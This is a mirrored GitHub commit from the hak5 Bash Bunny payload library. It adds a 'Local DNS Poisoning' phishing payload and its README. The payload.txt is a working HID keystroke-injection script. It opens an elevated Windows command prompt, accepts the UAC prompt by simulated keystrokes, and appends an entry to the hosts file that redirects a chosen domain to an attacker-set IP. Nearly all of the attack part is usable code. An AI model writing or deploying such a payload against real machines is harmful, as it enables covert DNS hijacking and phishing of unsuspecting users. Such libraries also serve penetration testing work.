mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Added Simple Hosts DNS Spoofing payload (#223)
* Local hosts DNS spoofing attack This is a simple hosts DNS spoofin attack, where the target gets redirected to a set IP when going to a certain website. * Create README.md * Update README.md
This commit is contained in:
committed by
Sebastian Kinne
parent
691f7e5bc9
commit
6a9134d84b
9
payloads/library/phishing/Local_DNS_Poisoning/README.md
Normal file
9
payloads/library/phishing/Local_DNS_Poisoning/README.md
Normal file
@@ -0,0 +1,9 @@
|
|||||||
|
# Hosts DNS Spoofer
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
Redirects a domain to a set IP adres by changing the hosts file. The UAC bypass is done so it works on windows 10.
|
||||||
|
|
||||||
|
## Configuration
|
||||||
|
|
||||||
|
Change the domain you want to redirect and the IP you want to direct it to.
|
||||||
29
payloads/library/phishing/Local_DNS_Poisoning/payload.txt
Normal file
29
payloads/library/phishing/Local_DNS_Poisoning/payload.txt
Normal file
@@ -0,0 +1,29 @@
|
|||||||
|
#Title: Local DNS Poisoning
|
||||||
|
#Description: Attacks the host file to redirect a website of your chosing for a given domain
|
||||||
|
#Author: DavidSpek
|
||||||
|
#Props: ashbreeze96 and overwraith
|
||||||
|
#Target: Windows (Including 10 latest build)
|
||||||
|
|
||||||
|
|
||||||
|
LED R 200
|
||||||
|
|
||||||
|
ATTACKMODE HID
|
||||||
|
LED STAGE1
|
||||||
|
Q GUI x
|
||||||
|
Q DELAY 50
|
||||||
|
Q A
|
||||||
|
Q DELAY 500
|
||||||
|
Q LEFTARROW
|
||||||
|
Q DELAY 50
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 100
|
||||||
|
Q STRING set file="%windir%\System32\drivers\etc\hosts"
|
||||||
|
Q DELAY 50
|
||||||
|
Q ENTER
|
||||||
|
Q STRING 'echo 10.1.1.0 test.com>>%file%'
|
||||||
|
Q DELAY 50
|
||||||
|
Q ENTER
|
||||||
|
Q STRING exit
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
LED FINISH
|
||||||
Reference in New Issue
Block a user